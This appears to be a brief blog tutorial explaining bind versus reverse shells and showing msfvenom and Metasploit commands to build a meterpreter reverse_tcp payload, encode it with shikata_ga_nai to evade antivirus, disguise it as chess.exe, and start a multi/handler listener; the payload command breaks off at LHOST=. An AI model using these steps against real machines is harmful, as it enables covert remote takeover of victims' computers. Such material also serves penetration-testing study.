msfvenom creating a reverse shell and evading payload from av
There are two types of shell namely bind and reverse shell. Bind shell creates a new service and attacker connect to this service.
Reverse shell on the other hand, is triggered by the user while an attacker runs some listener and target machine.
msfvenom allows hacker to create / re-create a payload and hide it from AV detection.
The command below, hides our payload / attack using reverse_tcp using an encoder called shikata_ga_nai into a file called chess.exe.
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=
To listen to any victim, we will issue the following commands :-
msf >use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
Comments